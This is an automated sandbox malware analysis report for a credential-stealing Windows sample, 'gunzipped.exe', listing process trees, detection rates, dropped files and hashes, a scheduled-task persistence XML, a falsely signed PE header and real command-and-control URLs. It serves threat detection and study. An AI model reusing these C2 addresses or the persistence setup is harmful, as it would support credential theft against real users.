      conhost.exe (started)
    schtasks.exe 1 (started)
      conhost.exe (started)
    gunzipped.exe (started)
  mPvIOxEZXJsdYp.exe 5 (started)
    signatures: Multi AV Scanner detection for dropped file; Tries to steal Mail credentials (via file registry); Machine Learning detection for dropped file
    schtasks.exe 1 (started)
      conhost.exe (started)
    mPvIOxEZXJsdYp.exe (started)
    mPvIOxEZXJsdYp.exe (started)

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Source | Detection | Scanner | Label | Link
gunzipped.exe | 32% | Virustotal | | Browse
gunzipped.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | 18% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | 32% | Virustotal | | Browse
                      No Antivirus matches
                      No Antivirus matches
Source | Detection | Scanner | Label | Link
http://kbfvzoboss.bid/alien/fre.php | 100% | URL Reputation | malware |
http://alphastand.top/alien/fre.php | 100% | URL Reputation | malware |
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
http://alphastand.win/alien/fre.php | 100% | URL Reputation | malware |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://alphastand.trade/alien/fre.php | 100% | URL Reputation | malware |
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/bThe | 0% | Avira URL Cloud | safe |
http://45.77.223.48/~blog/?ajax=a | 0% | Avira URL Cloud | safe |
http://crt.cRa | 0% | Avira URL Cloud | safe |
http://45.77.223.48/~blog/index.php?rest_route=/ | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn/cThe | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn/bThe | 0% | Virustotal | | Browse
http://45.77.223.48/~blog/index.php?rest_route=/ | 0% | Virustotal | | Browse
http://45.77.223.48/~blog/?ajax=a | NaN% | Virustotal | | Browse
http://www.founder.com.cn/cn/cThe | 0% | Virustotal | | Browse
http://www.founder.com.cn/cn | 0% | Avira URL Cloud | safe |
http://www.zhongyicts.com.cn | 0% | Avira URL Cloud | safe |
http://www.zhongyicts.com.cn | 1% | Virustotal | | Browse
http://www.founder.com.cn/cn | 0% | Virustotal | | Browse
                      No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: malware | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: malware | unknown
http://45.77.223.48/~blog/?ajax=a | true | NaN%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: malware | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://45.77.223.48/~blog/index.php?rest_route=/ | gunzipped.exe, 00000007.00000002.1967011464.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/bThe | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.ibsensoftware.com/ | mPvIOxEZXJsdYp.exe, mPvIOxEZXJsdYp.exe, 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crt.cRa | gunzipped.exe, 00000000.00000002.1739814239.000000000798C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.w.org/ | gunzipped.exe, 00000007.00000002.1967011464.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.tiro.com | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | gunzipped.exe, mPvIOxEZXJsdYp.exe.0.dr | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | gunzipped.exe, 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, mPvIOxEZXJsdYp.exe, 00000008.00000002.1763912656.0000000002F66000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | gunzipped.exe, 00000000.00000002.1738130730.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
45.77.223.48 | unknown | United States | | 20473 | AS-CHOOPAUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1431964
Start date and time: 2024-04-26 04:56:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: gunzipped.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@20/13@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 161
• Number of non-executed functions: 30
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
03:57:06 | Task Scheduler | Run new task: mPvIOxEZXJsdYp path: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
04:57:04 | API Interceptor | 13x Sleep call for process: gunzipped.exe modified
04:57:05 | API Interceptor | 14x Sleep call for process: powershell.exe modified
04:57:07 | API Interceptor | 1x Sleep call for process: mPvIOxEZXJsdYp.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
45.77.223.48 | SCB#89940578.exe | Get hash | malicious | Lokibot, PureLog Stealer | Browse | 45.77.223.48/~blog/?ajax=posts.php
 | Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe | Get hash | malicious | Lokibot, PureLog Stealer | Browse | 45.77.223.48/~blog/?ajax=ee
 | SCB99440721399.exe | Get hash | malicious | Lokibot, PureLog Stealer | Browse | 45.77.223.48/~blog/?ajax=posts.php
                                              No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AS-CHOOPAUS | SCB#89940578.exe | Get hash | malicious | Lokibot, PureLog Stealer | Browse | 45.77.223.48
 | Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe | Get hash | malicious | Lokibot, PureLog Stealer | Browse | 45.77.223.48
 | SCB99440721399.exe | Get hash | malicious | Lokibot, PureLog Stealer | Browse | 45.77.223.48
 | pikabot_core.bin.exe | Get hash | malicious | PikaBot | Browse | 45.32.188.56
 | https://i.imgur.com/EoTj4iI.png | Get hash | malicious | Unknown | Browse | 155.138.160.21
 | https://i.imgur.com/VlAllek.png | Get hash | malicious | Unknown | Browse | 155.138.160.21
 | shipping document.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 80.240.20.220
 | Remittance. #U0440df.html | Get hash | malicious | HTMLPhisher | Browse | 45.76.249.237
 | NMdpQecbkg.elf | Get hash | malicious | Mirai | Browse | 44.40.187.94
 | shipping document.vbs | Get hash | malicious | FormBook, GuLoader | Browse | 80.240.20.220
                                              No context
                                              No context
Process: C:\Users\user\Desktop\gunzipped.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.379677338874509
Encrypted: false
SSDEEP: 48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZuUyus:tLHxvIIwLgZ2KRHWLOugIs
MD5: D9B3B1E79DF444E11801E4C8824D3DC1
SHA1: F96D6D68C57452C8CF4CA61BC78C3626A58F78E7
SHA-256: E27D2875176040071D8358525C821BA3CD92E42BA6146A43E8A6E2075C025DFD
SHA-512: 9DF885DBB14EEC29A5C3EB0FF2272988AA22D291D52C123F73C834B30CFEE1F66DE79E1C5D5D6097CE3083628700FAEB703110E58071FDEFCC904ECF8300B93E
Malicious: false
Reputation: low
Preview: @...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Users\user\Desktop\gunzipped.exe
File Type: XML 1.0 document, ASCII text
Category: dropped
Size (bytes): 1580
Entropy (8bit): 5.12294802265756
Encrypted: false
SSDEEP: 24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtad7xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTCv
MD5: E78528F29C281C0F288ABE992CCA06D1
SHA1: 1478063B53A4A79C7440ACD309E45AEEF3654C25
SHA-256: CE0471D4E81227FC3EBAEBC5E3DAB5F9ED98DECC4B6D389D0B472A84637D644A
SHA-512: D684050C32BF833EFF9A2177709F79303A7437267D1EA2102151CF160AB79117C7280A00BA5EC95EDDB3D8E676DF03D9AF76EF1D506A67117B6E3DD0EF36FDF9
Malicious: true
Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                              Process:C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1580
                                              Entropy (8bit):5.12294802265756
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtad7xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTCv
                                              MD5:E78528F29C281C0F288ABE992CCA06D1
                                              SHA1:1478063B53A4A79C7440ACD309E45AEEF3654C25
                                              SHA-256:CE0471D4E81227FC3EBAEBC5E3DAB5F9ED98DECC4B6D389D0B472A84637D644A
                                              SHA-512:D684050C32BF833EFF9A2177709F79303A7437267D1EA2102151CF160AB79117C7280A00BA5EC95EDDB3D8E676DF03D9AF76EF1D506A67117B6E3DD0EF36FDF9
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                              Process:C:\Users\user\Desktop\gunzipped.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Users\user\Desktop\gunzipped.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):46
                                              Entropy (8bit):1.0424600748477153
                                              Encrypted:false
                                              SSDEEP:3:/lbq:4
                                              MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                              SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                              SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                              SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                              Malicious:false
                                              Preview:........................................user.
                                              Process:C:\Users\user\Desktop\gunzipped.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):705032
                                              Entropy (8bit):7.950061434391321
                                              Encrypted:false
                                              SSDEEP:12288:6jqnHvjNIrpf9rN/mc/CPV77Qykhe+AK9hCqAZHApvF1sdsgTWEmBuPg6AbTokR:6GPjKr5BNDAF7GAKeZHApvFWdsisBuoT
                                              MD5:4B905E6548F4D5040FAB8962CB71877E
                                              SHA1:15C3785700D10E32CE7E17D706194DD9BAA8442A
                                              SHA-256:6FD2687A66899AA63357F7434A418B2BD873EEBDA9520129B20FD3E7E889CED1
                                              SHA-512:75BEEFB8E58CC71F433980CEB6FF74C022D35332037B905E9E6644E09DEA33BA36B41DD4C8E1E6874F302208FCCD93AD258C74D09C08828D65BF7661026A3CAD
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 18%
• Antivirus: Virustotal, Detection: 32%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....+f..............0..T...6.......s... ........@.. ....................................@.................................|s..O........2...............6........................................................... ............... ..H............text....S... ...T.................. ..`.rsrc....2.......4...V..............@..@.reloc..............................@..B.................s......H........]...p..........................................................:.(......}....*..0...........(....o'....(......(....o+.......o*...(....o)...(.......o-.....(......(......o........r...po......o.....o.....o......o.........(........o.....3....o .......r...ps!...z&....*.........m.:........0..;.......("...r...po#...o$...s%....s&.....r...po......o'....o....((...,..o)...r...p~*...o+...&+..o)...r...p.o....o+...&.o....((...,..o)...r...p~*...o+...&+..o)...r...p.o....o+...&.o....
                                              Process:C:\Users\user\Desktop\gunzipped.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.950061434391321
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                              • Win32 Executable (generic) a (10002005/4) 49.93%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:gunzipped.exe
                                              File size:705'032 bytes
                                              MD5:4b905e6548f4d5040fab8962cb71877e
                                              SHA1:15c3785700d10e32ce7e17d706194dd9baa8442a
                                              SHA256:6fd2687a66899aa63357f7434a418b2bd873eebda9520129b20fd3e7e889ced1
                                              SHA512:75beefb8e58cc71f433980ceb6ff74c022d35332037b905e9e6644e09dea33ba36b41dd4c8e1e6874f302208fccd93ad258c74d09c08828d65bf7661026a3cad
                                              SSDEEP:12288:6jqnHvjNIrpf9rN/mc/CPV77Qykhe+AK9hCqAZHApvF1sdsgTWEmBuPg6AbTokR:6GPjKr5BNDAF7GAKeZHApvFWdsisBuoT
                                              TLSH:2CE412617778D393C2B15BB045B8D5AA5BB7A5563A20D3CD0DA4618F2BD0B80FF20B63
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....+f..............0..T...6.......s... ........@.. ....................................@................................
                                              Icon Hash:49598b8999894929
                                              Entrypoint:0x4a73ce
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x662B05C9 [Fri Apr 26 01:39:21 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Signature Valid:false
                                              Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
Not Before, Not After
• Not Before: 13/11/2018 00:00:00, Not After: 08/11/2021 23:59:59
                                              Subject Chain
                                              • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                              Version:3
                                              Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                              Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                              Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                              Serial:7C1118CBBADC95DA3752C46E47A27438
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              cmp byte ptr [edi+38h], cl
                                              pop edx
                                              xor eax, 50374856h
                                              xor al, 00h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [ecx+42h], al
                                              cmp byte ptr [esp+esi+51h], dl
                                              cmp byte ptr [ecx+4Fh], dl
                                              inc esp
                                              push ebp
                                              inc ebp
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
